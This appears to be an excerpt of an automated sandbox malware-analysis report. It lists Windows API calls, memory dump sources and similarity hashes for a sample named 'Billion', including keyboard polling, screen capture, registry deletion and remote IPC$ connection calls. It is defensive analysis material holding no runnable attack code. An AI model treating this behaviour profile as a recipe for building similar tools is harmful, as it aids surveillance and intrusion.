                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                          • String ID: @$(
                                                                                                                                                                                                                                                                                                          • API String ID: 3962739598-24772804
                                                                                                                                                                                                                                                                                                          • Opcode ID: 63048ce2aa2d6bce3f4ca6131bf8d8e49c2b1bd00d58f2bd17fe747f85e2308c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 972e147f71c0196c647e4f58d5b630cffc34987af6661203c3a3c40dbf60d65c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63048ce2aa2d6bce3f4ca6131bf8d8e49c2b1bd00d58f2bd17fe747f85e2308c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFB18931600219EFCF15CF68C989BAE7BB2BF54708F598069EC48AB295D770ED80CB51
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001C97B6
                                                                                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 001C97C6
                                                                                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 001C97D1
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 001C9879
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001C992B
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 001C9948
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 001C9958
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001C998A
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001C99CC
                                                                                                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001C99FD
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                                          • String ID: 0$(
                                                                                                                                                                                                                                                                                                          • API String ID: 1026556194-3977433327
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 001B3035
                                                                                                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001B3045
                                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 001B3051
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 001B305E
                                                                                                                                                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001B30CA
                                                                                                                                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001B3109
                                                                                                                                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001B312D
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 001B3135
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 001B313E
                                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 001B3145
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 001B3150
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 001952E6
                                                                                                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00195328
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00195339
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00195345
                                                                                                                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0019537A
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 001953B2
                                                                                                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 001953EB
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00195445
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00195477
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001954EF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                          • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                          • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(002029C0,000000FF,00000000,00000030), ref: 0019C973
                                                                                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(002029C0,00000004,00000000,00000030), ref: 0019C9A8
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0019C9BA
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 0019CA00
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0019CA1D
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 0019CA49
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0019CA90
                                                                                                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0019CAD6
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0019CAEB
                                                                                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0019CB0C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0019E4D4
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0019E4FA
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019E504
                                                                                                                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0019E554
                                                                                                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0019E570
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                          • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetCursorPos.USER32(?), ref: 001319E1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: ScreenToClient.USER32(00000000,?), ref: 001319FE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetAsyncKeyState.USER32(00000001), ref: 00131A23
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetAsyncKeyState.USER32(00000002), ref: 00131A3D
                                                                                                                                                                                                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 001C95C7
                                                                                                                                                                                                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 001C95CD
                                                                                                                                                                                                                                                                                                          • ReleaseCapture.USER32 ref: 001C95D3
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 001C966E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001C9681
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 001C975B
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$( $( $`
                                                                                                                                                                                                                                                                                                          • API String ID: 1924731296-133163302
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001BD6C4
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 001BD6ED
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001BD7A8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001BD70A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 001BD71D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001BD72F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001BD765
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001BD788
                                                                                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 001BD753
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 2734957052-4033151799
APIs
• timeGetTime.WINMM ref: 0019EFCB
  • Part of subcall function 0014F215: timeGetTime.WINMM(?,?,0019EFEB), ref: 0014F219
• Sleep.KERNEL32(0000000A), ref: 0019EFF8
• EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0019F01C
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0019F03E
• SetActiveWindow.USER32 ref: 0019F05D
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0019F06B
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0019F08A
• Sleep.KERNEL32(000000FA), ref: 0019F095
• IsWindow.USER32 ref: 0019F0A1
• EndDialog.USER32(00000000), ref: 0019F0B2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
APIs
  • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0019F374
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0019F38A
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0019F39B
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0019F3AD
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0019F3BE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
APIs
• GetKeyboardState.USER32(?), ref: 0019A9D9
• SetKeyboardState.USER32(?), ref: 0019AA44
• GetAsyncKeyState.USER32(000000A0), ref: 0019AA64
• GetKeyState.USER32(000000A0), ref: 0019AA7B
• GetAsyncKeyState.USER32(000000A1), ref: 0019AAAA
• GetKeyState.USER32(000000A1), ref: 0019AABB
• GetAsyncKeyState.USER32(00000011), ref: 0019AAE7
• GetKeyState.USER32(00000011), ref: 0019AAF5
• GetAsyncKeyState.USER32(00000012), ref: 0019AB1E
• GetKeyState.USER32(00000012), ref: 0019AB2C
• GetAsyncKeyState.USER32(0000005B), ref: 0019AB55
• GetKeyState.USER32(0000005B), ref: 0019AB63
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
APIs
• GetDlgItem.USER32(?,00000001), ref: 00196649
• GetWindowRect.USER32(00000000,?), ref: 00196662
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 001966C0
• GetDlgItem.USER32(?,00000002), ref: 001966D0
• GetWindowRect.USER32(00000000,?), ref: 001966E2
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00196736
• GetDlgItem.USER32(?,000003E9), ref: 00196744
• GetWindowRect.USER32(00000000,?), ref: 00196756
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00196798
• GetDlgItem.USER32(?,000003EA), ref: 001967AB
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001967C1
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 001967CE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00132152
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 001728D1
                                                                                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001728EA
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001728FA
                                                                                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00172912
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00172933
                                                                                                                                                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00172942
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0017295F
                                                                                                                                                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001311F5,00000000,00000000,00000000,000000FF,00000000), ref: 0017296E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 1268354404-2181176062
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00180D31,00000001,0000138C,00000001,00000000,00000001,?,001AEEAE,00202430), ref: 0019A091
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00180D31,00000001), ref: 0019A09A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00180D31,00000001,0000138C,00000001,00000000,00000001,?,001AEEAE,00202430,?), ref: 0019A0BC
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00180D31,00000001), ref: 0019A0BF
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0019A1E0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                          • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9fe920d3869ad238cfe630813f1cb3f7b5035cbdbbf82601c477706f63105444
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b192b3f35ad5ce3e256d11f3b875a1f4b6ec118d268c151a5ed059e39766898
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe920d3869ad238cfe630813f1cb3f7b5035cbdbbf82601c477706f63105444
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01415E7290421DAACF04FBE0DD86DEEB778AF28344F500065F605B6092EB756F49CBA1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00191093
                                                                                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001910AF
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001910CB
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001910F5
                                                                                                                                                                                                                                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0019111D
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00191128
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0019112D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                          • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                          • Opcode ID: afed5f6e031d0c3b7a13ff910c39e3c1634d9c6e7adb8544d270ac22fbbd375f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e5bcad0e933dc6a1548225783d397c13cc94a236566cf93188c6f5a4e949012
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afed5f6e031d0c3b7a13ff910c39e3c1634d9c6e7adb8544d270ac22fbbd375f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C41E572C10229BBCF11EBA4EC85DEEB7B8FF14750F044169FA01A2161EB719E44CB50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001C4AD9
                                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 001C4AE0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001C4AF3
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 001C4AFB
                                                                                                                                                                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 001C4B06
                                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 001C4B10
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001C4B1A
                                                                                                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 001C4B30
